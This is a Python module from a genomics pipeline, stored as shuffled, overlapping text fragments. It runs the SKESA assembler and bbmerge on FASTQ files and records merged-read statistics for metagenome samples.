sample.general.logerr, None, None) def merge(self, sample): \"\"\" Use bbmerge to", "Initialise variables num_reads = 0 paired_reads = 0 # Open the log file", "'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run the assembly out, err =", "number of reads that could be paired from the bbmerge # err stream", "# Open the log file with open(err_log, 'r') as error_log: # Extract the", "all the merged FASTQ files in one directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path)", "sample object flagged as a metagenome \"\"\" # Set the assembly file to", "import os __author__ = 'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self):", "False # If there are two fastq files if len(fastqfiles) == 2: #", "if re-running # the analysis else: lines = list() with open(report, 'r') as", "paired_reads = 0 # Open the log file with open(err_log, 'r') as error_log:", "to the metadata sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile =", "merge(self, sample): \"\"\" Use bbmerge to merge paired FASTQ files for use in", "command sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles: # If the sample is a", "filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' # Add the name and path of the", "import progressbar import logging import shutil import os __author__ = 'adamkoziol' class Skesa(object):", "try: # Set the name of the filtered assembly file filtered_outputfile = os.path.join(self.path,", "# Can only merge paired-end if len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads')", "file if size == 0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile,", "Extract the total number of reads, and the number of reads that could", "that could be paired :param sample: metadata sample object flagged as a metagenome", "line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta output file", "paired :param sample: metadata sample object flagged as a metagenome \"\"\" # Set", "assemble it. Otherwise, run the pre-metagenome pipeline try: status = sample.run.Description except AttributeError:", "reads, paired_reads, number of paired readds \"\"\" # Initialise variables num_reads = 0", "report doesn't exist, create it with the header and the results from the", "the report exists, open it to determine which samples have already been added", "as assembly is not desirable for metagenomes sample.general.assemblyfile = 'NA' # Can only", "Set the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta'", "sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None)", "self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) def", "report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total number of reads, and the", "= 'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run the assembly out, err", "paired FASTQ files for use in metagenomics pipelines. Create a report with the", "else: lines = list() with open(report, 'r') as report_file: for line in report_file:", "number of reads, paired_reads, number of paired readds \"\"\" # Initialise variables num_reads", "a pure isolate, assemble it. Otherwise, run the pre-metagenome pipeline try: status =", "os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads): # Run the merging command out, err,", "' \\ '--use_paired_ends --vector_percent 1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) #", "line in report_file: lines.append(line.split(',')[0]) # Add the results to the report if sample.name", "sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' # Add the name and path", "class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa to assemble", "# Set the name of the filtered assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies',", "filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name of the unfiltered spades", "unmerged files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error =", "reads that could be paired :param err_log: bbmerge outputs the stats in the", "= inputobject.starttime self.cpus = inputobject.cpus self.path = inputobject.path self.logfile = inputobject.logfile self.reportpath =", "the name of the unfiltered spades assembly output file if os.path.isfile(sample.general.assemblyfile): size =", "self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus = inputobject.cpus self.path = inputobject.path self.logfile", "to assemble genomes \"\"\" with progressbar(self.metadata) as bar: for sample in bar: #", "\"\"\" Use bbmerge to merge paired FASTQ files for use in metagenomics pipelines.", "report to store the metagenome file merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') #", "{contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there are no fastq files, populate the", "sample.general.logerr, None, None) def merge(self, sample): \"\"\" Use bbmerge to merge paired FASTQ", "= self.reads(error) # If the report doesn't exist, create it with the header", "status = 'unknown' if status == 'metagenome': self.merge(sample) else: # Set the output", "2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path - keep all the", "as error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set the name of", "of the filtered assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the", "merge paired FASTQ files for use in metagenomics pipelines. Create a report with", "genomes \"\"\" with progressbar(self.metadata) as bar: for sample in bar: # Initialise the", "threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) with open(log, 'w') as log_file:", "pipeline try: status = sample.run.Description except AttributeError: status = 'unknown' if status ==", "with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\"", "== 2: # Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq", "file to 'NA' as assembly is not desirable for metagenomes sample.general.assemblyfile = 'NA'", "except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile =", "= os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the name of the merged, and unmerged", "if not os.path.isfile(sample.general.mergedreads): # Run the merging command out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0],", "Set the name of the report to store the metagenome file merging results", "0 # Open the log file with open(err_log, 'r') as error_log: # Extract", "log = os.path.join(outpath, 'log') error = os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads): #", "= 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile):", "filtered assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name of", "sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error = os.path.join(outpath, 'err')", "= 'NA' # Add the name and path of the filtered file to", "the filtered file to the metadata sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile =", "stream num_reads, num_pairs = self.reads(error) # If the report doesn't exist, create it", "Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads}", "total number of reads, paired_reads, number of paired readds \"\"\" # Initialise variables", "with open(log, 'w') as log_file: log_file.write(out) with open(error, 'w') as error_file: error_file.write(err) except", "total=num_reads, paired=num_pairs)) # If the report exists, open it to determine which samples", "command out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile,", "is a pure isolate, assemble it. Otherwise, run the pre-metagenome pipeline try: status", "re-running # the analysis else: lines = list() with open(report, 'r') as report_file:", "as log_file: log_file.write(out) with open(error, 'w') as error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general,", "from subprocess import CalledProcessError from click import progressbar import logging import shutil import", "lines.append(line.split(',')[0]) # Add the results to the report if sample.name not in lines:", "open(error, 'w') as error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set the", "exist, create it with the header and the results from the first sample", "path of the filtered file to the metadata sample.general.filteredfile = filtered_outputfile except AttributeError:", "Set the name of the merged, and unmerged files sample.general.mergedreads = \\ os.path.join(merge_path,", "'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): #", "{contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above, but use single read settings", "self.logfile, sample.general.logout, sample.general.logerr, None, None) def merge(self, sample): \"\"\" Use bbmerge to merge", "files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error = os.path.join(outpath,", "appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA' except AttributeError:", "report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse the outputs from bbmerge", "Can only merge paired-end if len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath)", "'--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there are no fastq", "report exists, open it to determine which samples have already been added -", "'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the report exists, open", "skesa_assemble(self): \"\"\" Run skesa to assemble genomes \"\"\" with progressbar(self.metadata) as bar: for", "if status == 'metagenome': self.merge(sample) else: # Set the output directory sample.general.assembly_output =", "def merge(self, sample): \"\"\" Use bbmerge to merge paired FASTQ files for use", "well as the number of reads that could be paired :param err_log: bbmerge", "contigs.fasta output file from the assembler is present. If not, set the .bestassembly", "error = os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads): # Run the merging command", "# If there are two fastq files if len(fastqfiles) == 2: # Set", "# Run the assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr,", "If not, set the .bestassembly attribute to 'NA' \"\"\" for sample in self.metadata:", "size = os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly isn't just an empty file", "Merge path - keep all the merged FASTQ files in one directory merge_path", "{threads} ' \\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there", "try: status = sample.run.Description except AttributeError: status = 'unknown' if status == 'metagenome':", "# Add the results to the report if sample.name not in lines: with", "click import progressbar import logging import shutil import os __author__ = 'adamkoziol' class", "sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--use_paired_ends --vector_percent 1 '", "\"\"\" # Set the assembly file to 'NA' as assembly is not desirable", "log_file: log_file.write(out) with open(error, 'w') as error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads')", ".format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the the forward fastq files sample.general.assemblyfastq =", "line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads,", "out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout,", "isolate, assemble it. Otherwise, run the pre-metagenome pipeline try: status = sample.run.Description except", "for line in report_file: lines.append(line.split(',')[0]) # Add the results to the report if", "report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the report exists, open it to determine", "'--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above, but use single read", "reads, and the number of reads that could be paired :param sample: metadata", "None) def merge(self, sample): \"\"\" Use bbmerge to merge paired FASTQ files for", "name of the report to store the metagenome file merging results report =", "AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA'", "# Set the the forward fastq files sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0]", "output file from the assembler is present. If not, set the .bestassembly attribute", "whether the contigs.fasta output file from the assembler is present. If not, set", "# Set the name of the unfiltered spades assembly output file if os.path.isfile(sample.general.assemblyfile):", "AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples", "None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) def merge(self, sample): \"\"\" Use", "'NA' sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime", "olctools.accessoryFunctions.accessoryFunctions import make_path, run_subprocess, write_to_logfile from genewrappers.biotools import bbtools from subprocess import CalledProcessError", "= 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble", "out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err,", "'NA' def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus = inputobject.cpus", "that could be paired from the bbmerge # err stream num_reads, num_pairs =", "sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) def merge(self,", "the assembly command sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles: # If the sample", "sample.general.logout, sample.general.logerr, None, None) def merge(self, sample): \"\"\" Use bbmerge to merge paired", "in one directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the name of", "outputs the stats in the error file :return: num_reads, the total number of", "CalledProcessError from click import progressbar import logging import shutil import os __author__ =", "# If the report exists, open it to determine which samples have already", "Run the assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None,", "sample if not os.path.isfile(report): with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs))", "Ensure that the assembly isn't just an empty file if size == 0:", "progressbar import logging import shutil import os __author__ = 'adamkoziol' class Skesa(object): def", "write_to_logfile from genewrappers.biotools import bbtools from subprocess import CalledProcessError from click import progressbar", "'log') error = os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads): # Run the merging", "metadata appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA' except", "None, None) with open(log, 'w') as log_file: log_file.write(out) with open(error, 'w') as error_file:", "reads that could be paired from the bbmerge # err stream num_reads, num_pairs", "single read settings for the assembler else: sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores", "<filename>genemethods/assemblypipeline/skesa.py<gh_stars>1-10 #!/usr/bin/env python3 from olctools.accessoryFunctions.accessoryFunctions import make_path, run_subprocess, write_to_logfile from genewrappers.biotools import bbtools", "the assembler is present. If not, set the .bestassembly attribute to 'NA' \"\"\"", "self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath make_path(os.path.join(self.path, 'BestAssemblies')) make_path(os.path.join(self.path, 'raw_assemblies')) make_path(self.reportpath) logging.info('Assembling sequences')", "the assembler else: sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--vector_percent", "- useful if re-running # the analysis else: lines = list() with open(report,", "# Set the name of the merged, and unmerged files sample.general.mergedreads = \\", "the total number of reads, as well as the number of reads that", "filtered file to the metadata sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA'", "from click import progressbar import logging import shutil import os __author__ = 'adamkoziol'", "= 'unknown' if status == 'metagenome': self.merge(sample) else: # Set the output directory", "metagenomics pipelines. Create a report with the total number of reads, and the", "'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--use_paired_ends --vector_percent 1 ' \\ '--contigs_out", "populate the metadata appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile =", "= 0 # Open the log file with open(err_log, 'r') as error_log: #", "bbmerge to merge paired FASTQ files for use in metagenomics pipelines. Create a", "assemble genomes \"\"\" with progressbar(self.metadata) as bar: for sample in bar: # Initialise", "to merge paired FASTQ files for use in metagenomics pipelines. Create a report", "the name of the report to store the metagenome file merging results report", "self.logfile, sample.general.logout, sample.general.logerr, None, None) with open(log, 'w') as log_file: log_file.write(out) with open(error,", "the necessary information for line in error_log: if 'Pairs:' in line: num_reads =", "and the results from the first sample if not os.path.isfile(report): with open(report, 'w')", "the error file :return: num_reads, the total number of reads, paired_reads, number of", "as above, but use single read settings for the assembler else: sample.commands.assemble =", "os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total number of reads, and the number of", "'r') as error_log: # Extract the necessary information for line in error_log: if", "open(log, 'w') as log_file: log_file.write(out) with open(error, 'w') as error_file: error_file.write(err) except (CalledProcessError,", "is present. If not, set the .bestassembly attribute to 'NA' \"\"\" for sample", "with the header and the results from the first sample if not os.path.isfile(report):", "total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse the outputs from bbmerge to extract", "with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the report", "= os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the the forward fastq", "file :return: num_reads, the total number of reads, paired_reads, number of paired readds", "the metadata appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA'", "sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output,", "number of reads, and the number of reads that could be paired from", "assembly file to 'NA' as assembly is not desirable for metagenomes sample.general.assemblyfile =", "forward = fastqfiles[0] gz = True if '.gz' in forward else False #", "file merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total number of", "paired :param err_log: bbmerge outputs the stats in the error file :return: num_reads,", "{threads} ' \\ '--use_paired_ends --vector_percent 1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile)", "'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip()", "os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the the forward fastq files", "to determine which samples have already been added - useful if re-running #", "read settings for the assembler else: sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads}", "assembler else: sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--vector_percent 1", "else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output", "the filtered assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name", "list() with open(report, 'r') as report_file: for line in report_file: lines.append(line.split(',')[0]) # Add", "merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total number of reads,", "for line in error_log: if 'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:'", "open it to determine which samples have already been added - useful if", "make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles =", "__author__ = 'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run", "import bbtools from subprocess import CalledProcessError from click import progressbar import logging import", "the forward fastq files sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0] gz = True", "files in one directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the name", "best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta output file from the assembler is present.", "the metadata sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA'", "--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there are no fastq files, populate", "the metagenome file merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total", "number of reads that could be paired :param sample: metadata sample object flagged", "= sample.run.Description except AttributeError: status = 'unknown' if status == 'metagenome': self.merge(sample) else:", "sample.name not in lines: with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs))", "path - keep all the merged FASTQ files in one directory merge_path =", "of the filtered file to the metadata sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile", "merged, and unmerged files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log')", "== 0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile", "report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse the outputs from", "assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out,", "as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the report exists, open it", "create it with the header and the results from the first sample if", "total number of reads, and the number of reads that could be paired", "= bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None)", "= line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads def", "Extract the necessary information for line in error_log: if 'Pairs:' in line: num_reads", "write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) def merge(self, sample): \"\"\" Use bbmerge", "mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) with open(log, 'w')", "= list() with open(report, 'r') as report_file: for line in report_file: lines.append(line.split(',')[0]) #", ".format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the report exists, open it to determine which", "paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta", "keep all the merged FASTQ files in one directory merge_path = os.path.join(self.path, 'merged_reads')", "could be paired :param err_log: bbmerge outputs the stats in the error file", "str() try: if sample.general.trimmedcorrectedfastqfiles: # If the sample is a pure isolate, assemble", "from the bbmerge # err stream num_reads, num_pairs = self.reads(error) # If the", "Add the results to the report if sample.name not in lines: with open(report,", "# Initialise variables num_reads = 0 paired_reads = 0 # Open the log", "num_reads, num_pairs = self.reads(error) # If the report doesn't exist, create it with", "unfiltered spades assembly output file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure that", "sample in self.metadata: try: # Set the name of the filtered assembly file", "metadata sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA' def", "= 'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa", "'--use_paired_ends --vector_percent 1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as", "use in metagenomics pipelines. Create a report with the total number of reads,", "reads that could be paired :param sample: metadata sample object flagged as a", "None) with open(log, 'w') as log_file: log_file.write(out) with open(error, 'w') as error_file: error_file.write(err)", "the merged, and unmerged files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath,", "sample.general.trimmedcorrectedfastqfiles # Set the the forward fastq files sample.general.assemblyfastq = fastqfiles forward =", "= \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error = os.path.join(outpath, 'err') try:", "but use single read settings for the assembler else: sample.commands.assemble = 'skesa --fastq", "sample.general.logerr, None, None) with open(log, 'w') as log_file: log_file.write(out) with open(error, 'w') as", "if sample.general.trimmedcorrectedfastqfiles: # If the sample is a pure isolate, assemble it. Otherwise,", "# If the sample is a pure isolate, assemble it. Otherwise, run the", "# the analysis else: lines = list() with open(report, 'r') as report_file: for", "the number of reads that could be paired :param err_log: bbmerge outputs the", ":param sample: metadata sample object flagged as a metagenome \"\"\" # Set the", "\\ '--use_paired_ends --vector_percent 1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same", "bbmerge to extract the total number of reads, as well as the number", "the assembly isn't just an empty file if size == 0: sample.general.bestassemblyfile =", "error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set the name of the", "the analysis else: lines = list() with open(report, 'r') as report_file: for line", "the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} '", "outputs from bbmerge to extract the total number of reads, as well as", "inputobject.cpus self.path = inputobject.path self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath make_path(os.path.join(self.path, 'BestAssemblies')) make_path(os.path.join(self.path,", "--cores {threads} ' \\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If", "https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--use_paired_ends --vector_percent 1", "os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly isn't just an empty", "in report_file: lines.append(line.split(',')[0]) # Add the results to the report if sample.name not", "sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the the forward", "that the assembly isn't just an empty file if size == 0: sample.general.bestassemblyfile", "first sample if not os.path.isfile(report): with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads,", "= os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles #", "sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA'", "'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse the" ]
